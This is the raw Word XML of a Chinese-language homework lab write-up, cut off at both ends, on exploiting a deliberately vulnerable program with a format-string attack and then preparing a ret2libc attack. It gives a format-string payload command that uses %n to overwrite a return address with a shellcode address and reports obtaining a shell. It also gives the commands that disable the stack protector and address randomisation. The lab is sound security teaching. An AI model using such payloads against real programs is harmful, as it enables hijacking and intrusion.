          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34548F5E" w14:textId="77777777" w:rsidR="00BF7B52" w:rsidRPr="005B0EC7" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="30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B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>找到返回地址保存的位置</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7DEBD" w14:textId="33D8EBF3" w:rsidR="003A6F1A" w:rsidRPr="00BF7B52" w:rsidRDefault="00BF7B52" w:rsidP="00BF7B52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="300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B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0EC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6DD1D" w14:textId="41939790" w:rsidR="00016F6D" w:rsidRPr="00016F6D" w:rsidRDefault="00016F6D" w:rsidP="00931859">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>寄存器的值放在变量</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>framep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，后面会把该值打印出来，这个变量的目的是找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>fmtstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数的返回地址存放的位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ebp+4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>时返回地址的内存地址，此外，还打印了调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>函数前后该返回地址存放的内容，目的是看内容是否发生改变，如果没有说明攻击存在问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173E0EA" w14:textId="304AF80B" w:rsidR="00691377" w:rsidRDefault="00691377" w:rsidP="00691377">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00691377">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00691377">
        <w:t xml:space="preserve"> -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00691377">
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00691377">
        <w:t xml:space="preserve"> -o prog2 prog2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A790A" w14:textId="0B7EF00A" w:rsidR="00691377" w:rsidRDefault="001B08E3" w:rsidP="001B08E3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FCB6E6D" wp14:editId="649F8559">
            <wp:extent cx="5274310" cy="12700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CEF7" w14:textId="73705129" w:rsidR="00D71B1D" w:rsidRDefault="001B08E3" w:rsidP="00691377">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>所以返回地址</w:t>
      </w:r>
      <w:r w:rsidR="008C3A71" w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的存储地址</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>B是0x</w:t>
      </w:r>
      <w:r w:rsidR="008C3A71" w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bffff3cc</w:t>
      </w:r>
      <w:r w:rsidR="006D7EDB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D7EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，返回地址等于ebp</w:t>
      </w:r>
      <w:r w:rsidR="006D7EDB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>+4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6947F" w14:textId="11588F5B" w:rsidR="006D7EDB" w:rsidRDefault="003C3660" w:rsidP="00691377">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用%</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不断的输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值，查看需要几个%</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指针指向</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7EDB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bffff3cc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C975540" w14:textId="1A22F649" w:rsidR="005B6643" w:rsidRDefault="005B6643" w:rsidP="003C3660">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2495186D" w14:textId="742F3893" w:rsidR="003C3660" w:rsidRDefault="003C3660" w:rsidP="003C3660">
      <w:r>
        <w:t>echo $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "\x</w:t>
      </w:r>
      <w:r w:rsidR="00627A37">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>e\xf</w:t>
      </w:r>
      <w:r w:rsidR="00627A37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>\xff\xbf@@@@\x</w:t>
      </w:r>
      <w:r w:rsidR="00627A37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>c\xf</w:t>
      </w:r>
      <w:r w:rsidR="00627A37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>\xff\xbf</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>")%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x:%.8x &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50C5F3EA" w14:textId="207C7C07" w:rsidR="005B6643" w:rsidRDefault="00B33CB0" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62AEEA4A" wp14:editId="20D1AB8B">
            <wp:extent cx="5153457" cy="30383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310" cy="30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13FB" w14:textId="4FC70B81" w:rsidR="005B6643" w:rsidRDefault="00EA57C4" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现第17个%</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值是0x</w:t>
      </w:r>
      <w:r>
        <w:t>bffff3ce</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以前面使用16个%</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到达该地址，再使用%</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将该地址的内容改成shellcode的地址的一部分0</w:t>
      </w:r>
      <w:r w:rsidR="006C3E77">
        <w:t>xbfff</w:t>
      </w:r>
      <w:r w:rsidR="00A366D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A366D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B11171" w14:textId="77777777" w:rsidR="00F31D47" w:rsidRDefault="00F31D47" w:rsidP="00F31D47">
      <w:bookmarkStart w:id="0" w:name="_Hlk76665704"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tr数组的起始地址为0xb</w:t>
      </w:r>
      <w:r>
        <w:t>ffff3e4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，假设恶意代码的起始地址A：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2809">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bffff3e4</w:t>
      </w:r>
      <w:r>
        <w:t>+0x90=0xbffff474</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F6E375" w14:textId="77777777" w:rsidR="00F31D47" w:rsidRDefault="00F31D47" w:rsidP="00F31D47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以要在0x</w:t>
      </w:r>
      <w:r>
        <w:t>bffff3cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的两字节处填写0x</w:t>
      </w:r>
      <w:r>
        <w:t>f474</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在0x</w:t>
      </w:r>
      <w:r>
        <w:t>bffff3ce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处填写0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">xbffff </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="2211387E" w14:textId="77777777" w:rsidR="00F31D47" w:rsidRPr="00F31D47" w:rsidRDefault="00F31D47" w:rsidP="00691377"/>
    <w:p w14:paraId="3C4CD807" w14:textId="7C9996F4" w:rsidR="00A366D9" w:rsidRDefault="00646C67" w:rsidP="00691377">
      <w:bookmarkStart w:id="1" w:name="_Hlk76665724"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写相应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，使用python脚本生成：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="2B41010F" w14:textId="708A01A4" w:rsidR="00646C67" w:rsidRDefault="007F6420" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要使用latin</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码，将python3设置为默认的python版本，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自带python2.7和python3.5</w:t>
      </w:r>
      <w:r w:rsidR="006D26FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以不要下乱七八糟的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED4E6B" w14:textId="28989045" w:rsidR="00EA57C4" w:rsidRDefault="003A4E49" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24FA70A7" wp14:editId="7C497DB1">
            <wp:extent cx="5274310" cy="1352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70DE" w14:textId="7F527E0F" w:rsidR="001727AC" w:rsidRDefault="001727AC" w:rsidP="00691377">
      <w:bookmarkStart w:id="2" w:name="_Hlk76665847"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成好</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，再次运行prog2程序，获得了shell</w:t>
      </w:r>
      <w:r w:rsidR="000F6856">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，返回地址也被修改成了shellcode的其实地址</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="44B342E3" w14:textId="7738DB63" w:rsidR="009F5BCD" w:rsidRDefault="00B15ED2" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4568FD" wp14:editId="2B33BC07">
            <wp:extent cx="5274310" cy="35648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DF1A" w14:textId="2E9A04AE" w:rsidR="002B58D5" w:rsidRDefault="00A233A5" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B2549C" wp14:editId="7FD61E0E">
            <wp:extent cx="5274310" cy="1010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2040" w14:textId="73E1AB96" w:rsidR="00CB00CB" w:rsidRDefault="00DC6C7B" w:rsidP="00691377">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338096D9" wp14:editId="30D4BF46">
            <wp:extent cx="5274310" cy="11309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A359" w14:textId="702784CF" w:rsidR="003A6F1A" w:rsidRDefault="003A6F1A" w:rsidP="00FA06C4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>开启</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>不可执行保护，通过ret2lib 进行利用，获得 shell （可以通过调用 system(“/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”)）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FFA447" w14:textId="77777777" w:rsidR="00F70464" w:rsidRPr="00F70464" w:rsidRDefault="00F70464" w:rsidP="00F7046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" w:name="_Hlk76666108"/>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>保护，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70464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F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内数据禁止作为代码执行，关闭</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stackguard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（地址随机化），使用以下指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464" w14:paraId="4B5F880E" w14:textId="77777777" w:rsidTr="000226D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314E2557" w14:textId="77777777" w:rsidR="00F70464" w:rsidRPr="00F01D3F" w:rsidRDefault="00F70464" w:rsidP="000226D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart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>gcc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>fno</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve">-stack-protector -z </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>noexecstack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> -o homework2 homework2.c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DFB43AA" w14:textId="77777777" w:rsidR="00F70464" w:rsidRPr="00F01D3F" w:rsidRDefault="00F70464" w:rsidP="000226D0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spellStart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sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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proofErr w:type="spellStart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>sysctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> -w </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart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>kernel.randomize</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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>_va_space</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F01D3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="590D594B" w14:textId="25F85F03" w:rsidR="00FA06C4" w:rsidRPr="00F70464" w:rsidRDefault="00A70A98" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4461CF68" wp14:editId="6537AE29">
            <wp:extent cx="5274310" cy="1962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8704" w14:textId="3157F02F" w:rsidR="007C7279" w:rsidRDefault="009A73BE" w:rsidP="00FA06C4">
      <w:bookmarkStart w:id="4" w:name="_Hlk76666452"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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获得system函数和exit函数的</w:t>
      </w:r>
      <w:r w:rsidR="005C69F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="01F1CB93" w14:textId="15A5F7FE" w:rsidR="005B5631" w:rsidRDefault="009C5F51" w:rsidP="00FA06C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F417E94" wp14:editId="1B9DFF50">
            <wp:extent cx="5274310" cy="8305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989A" w14:textId="58CEC0F4" w:rsidR="00D7471C" w:rsidRDefault="00542CD1" w:rsidP="00FA06C4">
      <w:bookmarkStart w:id="5" w:name="_Hlk76666486"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以将</w:t>
      </w:r>
      <w:r w:rsidR="00950443">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回地址修改为0</w:t>
      </w:r>
      <w:r w:rsidR="00950443">
        <w:t>xb7da3da0</w:t>
      </w:r>
      <w:r w:rsidR="000E1D5A">
